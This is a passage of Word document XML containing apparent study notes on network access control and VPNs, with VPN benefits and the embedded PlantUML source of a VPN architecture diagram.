      <w:r w:rsidRPr="0083048F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>monitoring</w:t>
      </w:r>
      <w:r w:rsidRPr="0083048F">
        <w:t>: NAC continuously monitors device behavior and compliance status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131F080F" w14:textId="77777777" w:rsidR="0083048F" w:rsidRPr="0083048F" w:rsidRDefault="0083048F" w:rsidP="0083048F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="414"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0083048F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r w:rsidRPr="0083048F">
        <w:t>: Non-compliant devices are guided through remediation processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2884D48F" w14:textId="15B51DCA" w:rsidR="0083048F" w:rsidRPr="0083048F" w:rsidRDefault="0083048F" w:rsidP="0083048F">
      <w:r w:rsidRPr="0083048F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Key </w:t>
      </w:r>
      <w:r w:rsidR="00D87103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="0083048F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>omponents:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADB32C4" w14:textId="1C9D730A" w:rsidR="0083048F" w:rsidRPr="0083048F" w:rsidRDefault="0083048F" w:rsidP="0083048F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="415"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0083048F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Device </w:t>
      </w:r>
      <w:r w:rsidRPr="0083048F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>discovery</w:t>
      </w:r>
      <w:r w:rsidRPr="0083048F">
        <w:t>: Identify all devices connecting to the network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16374141" w14:textId="69E3601C" w:rsidR="0083048F" w:rsidRPr="0083048F" w:rsidRDefault="0083048F" w:rsidP="0083048F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="415"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0083048F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Policy </w:t>
      </w:r>
      <w:r w:rsidRPr="0083048F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>enforcement</w:t>
      </w:r>
      <w:r w:rsidRPr="0083048F">
        <w:t>: Apply security policies based on device type and user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CF08FE" w14:textId="77777777" w:rsidR="0083048F" w:rsidRPr="0083048F" w:rsidRDefault="0083048F" w:rsidP="0083048F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="415"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0083048F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Quarantine</w:t>
      </w:r>
      <w:r w:rsidRPr="0083048F">
        <w:t>: Isolate non-compliant devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0198E2D3" w14:textId="77777777" w:rsidR="0083048F" w:rsidRPr="0083048F" w:rsidRDefault="0083048F" w:rsidP="0083048F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="415"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0083048F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r w:rsidRPr="0083048F">
        <w:t>: Guide users to fix compliance issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E572477" w14:textId="77777777" w:rsidR="001B197A" w:rsidRPr="001B197A" w:rsidRDefault="001B197A" w:rsidP="001B197A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="001B197A">
        <w:t>Virtual Private Networks (VPNs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001EC852" w14:textId="59F4D95B" w:rsidR="001B197A" w:rsidRPr="001B197A" w:rsidRDefault="001B197A" w:rsidP="001B197A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F79229" w14:textId="77777777" w:rsidR="001B197A" w:rsidRDefault="001B197A" w:rsidP="001B197A">
      <w:r w:rsidRPr="001B197A">
        <w:t xml:space="preserve">VPNs create </w:t>
      </w:r>
      <w:r w:rsidRPr="001B197A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>secure tunnels over public networks</w:t>
      </w:r>
      <w:r w:rsidRPr="001B197A">
        <w:t>, enabling remote access and site-to-site connectivity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264C71D2" w14:textId="43C1236E" w:rsidR="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Benefits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC3F286" w14:textId="22313AF3" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="442"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00135EB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Stronger </w:t>
      </w:r>
      <w:r w:rsidRPr="00135EB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">privacy &amp; anonymity: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E36F7B">
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidRPr="00E36F7B">
        <w:t>ides your IP address</w:t>
      </w:r>
      <w:r w:rsidRPr="00135EB3">
        <w:t xml:space="preserve"> so websites, advertisers, and even your ISP can’t easily track your online activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D7490A" w14:textId="6DF2CAA2" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="442"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00135EB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Better </w:t>
      </w:r>
      <w:r w:rsidR="00DE1DF3" w:rsidRPr="00135EB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>security on any network</w:t>
      </w:r>
      <w:r w:rsidRPr="00135EB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E36F7B">
        <w:t>Encrypts all data</w:t>
      </w:r>
      <w:r w:rsidRPr="00135EB3">
        <w:t xml:space="preserve"> between your device and the VPN server, protecting it from hackers, especially on public Wi</w:t>
      </w:r>
      <w:r w:rsidRPr="00135EB3">
        <w:noBreakHyphen/>
        <w:t>Fi (cafés, airports, hotels).</w:t>
      </w:r>
      <w:r w:rsidRPr="00135EB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00135EB3">
        <w:t>This really p</w:t>
      </w:r>
      <w:r w:rsidRPr="00135EB3">
        <w:t>revents “man</w:t>
      </w:r>
      <w:r w:rsidRPr="00135EB3">
        <w:noBreakHyphen/>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidRPr="00135EB3">
        <w:noBreakHyphen/>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidRPr="00135EB3">
        <w:noBreakHyphen/>
        <w:t>middle” attacks where someone intercepts your traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4619CA17" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="442"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00135EB3">
        <w:pict w14:anchorId="4FD7ABF8">
          <v:rect id="_x0000_i1321" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7322E4CF" w14:textId="182824D8" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="442"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00135EB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Access to </w:t>
      </w:r>
      <w:r w:rsidRPr="00135EB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>geo</w:t>
      </w:r>
      <w:r w:rsidRPr="00135EB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t xml:space="preserve">restricted content: </w:t>
      </w:r>
      <w:r w:rsidRPr="00135EB3">
        <w:t xml:space="preserve">Lets you </w:t>
      </w:r>
      <w:r w:rsidRPr="00E36F7B">
        <w:t>appear as if you’re in another country</w:t>
      </w:r>
      <w:r w:rsidRPr="00135EB3">
        <w:t xml:space="preserve"> by connecting to a server </w:t>
      </w:r>
      <w:r w:rsidRPr="00E36F7B">
        <w:t>there.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E36F7B">
        <w:t xml:space="preserve"> This is very</w:t>
      </w:r>
      <w:r w:rsidRPr="00135EB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E36F7B">
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="00E36F7B">
        <w:t>seful</w:t>
      </w:r>
      <w:r w:rsidRPr="00135EB3">
        <w:t xml:space="preserve"> for streaming services, websites, or apps that are blocked or limited in your region.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D57323" w14:textId="30F6E9E7" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="442"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00135EB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Avoid ISP </w:t>
      </w:r>
      <w:r w:rsidRPr="00135EB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">throttling: </w:t>
      </w:r>
      <w:r w:rsidRPr="00135EB3">
        <w:t>Some ISPs slow down (throttle) certain activities like streaming or gaming.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00135EB3">
        <w:t>A VPN hides your traffic type, making it harder for ISPs to selectively slow you down.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762471F4" w14:textId="58DD3BE1" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="442"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00135EB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Secure </w:t>
      </w:r>
      <w:r w:rsidRPr="00135EB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">remote work: </w:t>
      </w:r>
      <w:r w:rsidRPr="00135EB3">
        <w:t xml:space="preserve">Businesses use VPNs to give </w:t>
      </w:r>
      <w:r w:rsidRPr="00E36F7B">
        <w:t>employees safe access to internal systems from anywhere.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E36F7B">
        <w:t xml:space="preserve"> This</w:t>
      </w:r>
      <w:r w:rsidRPr="00E36F7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E36F7B">
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00E36F7B">
        <w:t>rotects</w:t>
      </w:r>
      <w:r w:rsidRPr="00135EB3">
        <w:t xml:space="preserve"> sensitive company data when working from home or traveling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E92D01" w14:textId="5B1EAAA5" w:rsidR="001B197A" w:rsidRPr="006945DF" w:rsidRDefault="001B197A" w:rsidP="006945DF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="001B197A">
        <w:t xml:space="preserve">How </w:t>
      </w:r>
      <w:r>
        <w:t>It</w:t>
      </w:r>
      <w:r w:rsidRPr="001B197A">
        <w:t xml:space="preserve"> Work</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7"/>
        <w:gridCol w:w="479"/>
      </w:tblGrid>
      <w:tr w:rsidR="00731117" w14:paraId="04D79D73" w14:textId="77777777" w:rsidTr="00135EB3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14328" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DFF297A" w14:textId="581A6294" w:rsidR="00731117" w:rsidRDefault="00135EB3" w:rsidP="001B197A">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47EC7DFA" wp14:editId="37FBF608">
                  <wp:extent cx="10972800" cy="7933690"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="106994076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0" cy="7933690"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3168" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33C366AA" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>@startuml</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A465D53" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>title VPN flows grouped: internal vs external (with detailed notes)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="287723A1" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7D9E8F3B" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>skinparam sequenceMessageAlign center</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46E9D008" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>skinparam sequence {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12DE97A7" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  ArrowColor #2d2d2d</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="006CA5DB" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  GroupBorderColor #6b6b6b</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63238146" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  GroupFontColor #222222</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6423358B" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35C9F601" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>autonumber 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FEF5C68" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3CB8C5AB" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>title VPN Architecture</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1783FA54" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3D272DC0" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>box  "Remote User Device"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2312F24C" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  actor "Remote User" as User</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28E61564" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  participant "VPN Client\n(OpenVPN/AnyConnect)" as Client</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DCF779E" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>end box</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B2CBD85" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">box "Public Network" </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E6F57FB" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  participant "Internet" as Internet</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="508F08A8" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>end box</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A4BF205" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">box "Private Network" </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E906D40" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  participant "VPN Gateway / Server" as Gateway</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35BC1C5F" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  participant "Firewall" as Firewall</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C99468D" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  participant "Corporate Network" as Corp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F34411F" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  database "Internal Resources" as Resources</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42B3416A" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00135EB3">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>end box</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71E162C9" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6E97ACB5" w14:textId="77777777" w:rsidR="00135EB3" w:rsidRPr="00135EB3" w:rsidRDefault="00135EB3" w:rsidP="00135EB3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
